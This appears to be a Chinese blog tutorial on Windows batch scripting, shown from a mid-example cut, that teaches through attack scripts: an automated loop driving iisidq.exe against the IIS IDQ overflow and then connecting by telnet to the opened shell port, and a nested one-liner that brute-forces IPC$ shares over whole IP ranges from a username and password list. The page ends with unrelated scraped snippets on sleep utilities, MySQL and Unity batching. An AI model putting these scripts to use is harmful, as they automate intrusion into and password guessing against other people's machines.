精通批處理

2021-08-29 21:28:46 字數 3063 閱讀 6741

echo 墨西哥語: 8

echo 墨西哥語+sp1: 9

goto exit /*跳轉exit段

:file /*file段顯示檔案沒有發現的資訊

echo 檔案iis5hack.exe沒有發現!程式終止執行!

goto exit /*跳轉exit段

:help /*help段顯示本批處理的使用格式幫助

echo 本程式用法如下:

echo iis [目標ip]

echo iis [目標ip] [開始的號碼9-0]

:exit /*exit段為程式出口

這個批處理基本沒有什麼迴圈只是一路走下來。所以**比較長難度不大!

例二這個例子是用iisidq.exe對有idq漏洞的機器進行溢位的批處理。使用的程式有iisidq.exe和系統自帶的程式telnet.exe。iisidq.exe的用法如下:

執行引數: 作業系統型別 目的位址 web埠 1 溢位監聽埠 《輸入命令1>

其中,如果輸入命令引數沒有輸入,那麼,預設為:"cmd.exe"。

其中作業系統型別型別的**範圍是0-14。我們編制的批處理使用的命令格式為 程式如下:

@echo off /*同例一

if not exist iisidq.exe goto file /*同例一

if %1 == "" goto error /*同例一

ping %1 -n 1 | find "received = 1" /*同例一

if errorlevel 1 goto error1 /*同例一

set b=%1 /*建立乙個環境變數b,將變數%1的內容傳遞給環境變數b。變數b的內容以後將是目標ip

set a=0 /*建立乙個環境變數a並指定環境變數a為0。由於使用整個批處理的迴圈所以用a來做計數器。

:no /*no段開始

if %a%==0 set d=0 /*如果環境變數a=0則建立環境變數d設定環境變數d=0。

if %a%==1 set d=1 /*環境變數d其實是作業系統型別**,用計數器來控制其

if %a%==2 set d=2 /*變動。

if %a%==3 set d=3

if %a%==4 set d=4

if %a%==5 set d=5

if %a%==6 set d=6

if %a%==7 set d=7

if %a%==9 set d=9

if %a%==10 set d=13

if %a%==11 set d=14

goto 0 /*變數傳遞完成後轉到標誌0處執行

:1echo 正在執行第%d%項!與目標%b%不能連線!正在嘗試連線請等候......

:0 /*標誌0開始

iisidq %d% %b% 80 1 99 |find "good" /*按格式傳送溢位命令並在結果中發現字串good(傳送**成功才會有字串good)

if errorlevel 1 goto 1 /*如果沒有good字串則沒有傳送成跳

/*轉標誌1處繼續嘗試傳送

ping 127.0.0.1 -n 8 >nul /*ping自己8次相當於延時8秒不顯示執

/*行結果

echo 正在執行第%d%項! /*報告正在溢位的作業系統型別

telnet %b% 99 /*連線溢位埠

echo. /*顯示乙個空行

if %d%==14 goto error1 /*如果作業系統型別為14則跳轉error1處(迴圈出口)

if %d%==13 set a=11 /*開始用計數器對作業系統**重新附值

if %d%==9 set a=10

if %d%==7 set a=9

if %d%==6 set a=7

if %d%==5 set a=6

if %d%==4 set a=5

if %d%==3 set a=4

if %d%==2 set a=3

if %d%==1 set a=2

if %d%==0 set a=1

goto no /*附值完成跳轉no段執行

:file /*以下都是出錯後的幫助提示

echo iisidq.exe沒有發現!將該檔案和本檔案放在同一目錄!

goto exit

:error

echo 錯誤!目標ip不可識別!請使用下面的格式連線!

echo idq [目標ip]

goto exit

:error1

echo 連線沒有成功!可能目標機器已經修補了該漏洞或者網路故障所至!

echo 請按照下面的格式手工嘗試!

echo iisidq [目標型別] [目標ip] [目標埠] [連線方式] [溢位埠]

echo telnet [目標ip] [溢位埠]

:exit /*整個程式的出口

這個批處理採用的整體迴圈掌握好計數器部分就掌握了這個批處理。

例三for /l %%a in (0,1,255) do for /l %%b in (0,1,255) do for /l %%c in (1,1,254) do for /f "tokens=1,2*" %%e in (userpass.txt) do net use \\%1.%%a.%%b.%%c\ipc$ %%e /u:%%f

上面的命令為1條命令。大家可以看出該命令使用了4個for來套用的。用法為:c:\>test.bat 218 當輸入218回車後該命令會由第1個for取初始值0為%%a然後繼續取第2個for的初始值0為%%b繼續取第3個for的初始值1為%%c最後乙個 for是將userpass.txt中的第一段字元作為密碼%%e第二段字元作為使用者名稱%%f最後執行命令 (這裡我把上面的值都帶進去,設密碼為123 使用者名為 abc)

net usr \\218.0.0.1\ipc$ 123 /u:abc

當然上面這個例子可能有些朋友會說太簡單並且太死板不靈活。我把這個例子做了些修改(完整檔案見光碟ipc.bat)由興趣的朋友可以自己看看。修改後的 程式可以靈活的查詢你指定開始到結束或你指定開始到最大ip的範圍。當然功能還可以在加強,至於能加強到什麼地步能不能成為乙個新的工具那就是你的事了。

批處理 sleep處理

echo off echo q debug nul echo bj jzh 0x ppppppa de dm do dh ls lu lx lezrr eeeuyrx2dx sleep.com echo 0dxfp,0xx.t0p,xtgsb4o piyu wwx0gwuy wv ovbx2gv0e...

mysql 批處理啟動 MySQL開啟批處理

mysql預設關閉批處理 開啟方法 在原始的url尾部新增開啟指令,如下標註語句 url jdbc mysql localhost 3306 mydb3 rewritebatchedstatements true 新增批處理 呼叫preparedstatement中的addbatch 方法,將一句s...

Unity 動態批處理和靜態批處理

為了提高遊戲效能,降低遊戲執行時的drawcall,unity會對網格頂點進行批處理,而批處理又分成了動態批處理和靜態批處理 優點 不用自己做任何事情,unity會在遊戲中自動進行動態批處理,只要滿足下述條件。在unity中,要進行動態批處理需要滿足以下條件 原理 unity會檢測哪些gameobj...